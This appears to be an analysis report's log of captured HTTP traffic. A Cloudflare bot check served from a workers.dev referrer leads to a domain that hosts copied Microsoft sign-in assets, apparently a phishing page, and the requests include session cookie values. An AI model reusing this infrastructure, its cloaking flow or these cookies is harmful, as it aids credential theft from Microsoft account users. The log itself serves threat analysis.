      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv75KWu00x_j8ePxwWqZoxHl0023scJz5x5keh3mFGQO4-1743017238-1.3.1.1-jx_ft8_17g_0aYlijdJ.MKowAo7nzTG5WB5RG6S_jWw/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/failure_retry/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92690c198d8043fb&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv75KWu00x_j8ePxwWqZoxHl0023scJz5x5keh3mFGQO4-1743017238-1.3.1.1-jx_ft8_17g_0aYlijdJ.MKowAo7nzTG5WB5RG6S_jWw/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/failure_retry/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/75863169:1743013566:8s5SCde_e_Y_rNlGSSewHykECy-1C9QdLwSuVYycC9I/92690c198d8043fb/whuvwZbUt_spxQaC6mzY5BJb.DzqfRU5VC3g7NpYCkU-1743017266-1.1.1.1-Oou4gX7mU1V32eGyTIN1Ea6G8kGUXesUAAmDyNOxg2wezKGA_LizmdbBAOLaZsO8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/92690c198d8043fb/1743017267269/Qa4rFPeeM4yObLp HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv75KWu00x_j8ePxwWqZoxHl0023scJz5x5keh3mFGQO4-1743017238-1.3.1.1-jx_ft8_17g_0aYlijdJ.MKowAo7nzTG5WB5RG6S_jWw/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/failure_retry/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/92690c198d8043fb/1743017267269/Qa4rFPeeM4yObLp HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/92690c198d8043fb/1743017267269/20ef7ed6af7716c2d33dbf968f23fffc06de1674adc4fea29426c51f8039b9b8/-1Wpqa_tefiexnv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv75KWu00x_j8ePxwWqZoxHl0023scJz5x5keh3mFGQO4-1743017238-1.3.1.1-jx_ft8_17g_0aYlijdJ.MKowAo7nzTG5WB5RG6S_jWw/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/failure_retry/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/75863169:1743013566:8s5SCde_e_Y_rNlGSSewHykECy-1C9QdLwSuVYycC9I/92690c198d8043fb/whuvwZbUt_spxQaC6mzY5BJb.DzqfRU5VC3g7NpYCkU-1743017266-1.1.1.1-Oou4gX7mU1V32eGyTIN1Ea6G8kGUXesUAAmDyNOxg2wezKGA_LizmdbBAOLaZsO8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/75863169:1743013566:8s5SCde_e_Y_rNlGSSewHykECy-1C9QdLwSuVYycC9I/92690c198d8043fb/whuvwZbUt_spxQaC6mzY5BJb.DzqfRU5VC3g7NpYCkU-1743017266-1.1.1.1-Oou4gX7mU1V32eGyTIN1Ea6G8kGUXesUAAmDyNOxg2wezKGA_LizmdbBAOLaZsO8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /?sign=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2RvdmVybWhhaW5zdHJpbS5pY3UvIiwiZG9tYWluIjoiZG92ZXJtaGFpbnN0cmltLmljdSIsImtleSI6IlhNRTVmSGFWVElVRiIsInJlZiI6bnVsbCwiaWF0IjoxNzQzMDE3Mjc2LCJleHAiOjE3NDMwMTczOTZ9.A7dhC-EcPIGb2ArdizRnXGDDwF2DwmwJ_bm9_3_Qmgo HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /index.html//?uuq_tgnqcf=vtwg HTTP/1.1Host: dovermhainstrim.icuConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_GjP1RdcVSKf6ASC7mgkR1g2.js HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_r1sg5sxlkljjoa22hvk04g2.js HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/oneDs_641b1cf809bdc17b42ab.js HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /Prefetch/Prefetch.aspx HTTP/1.1Host: portal.microsoftonline.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
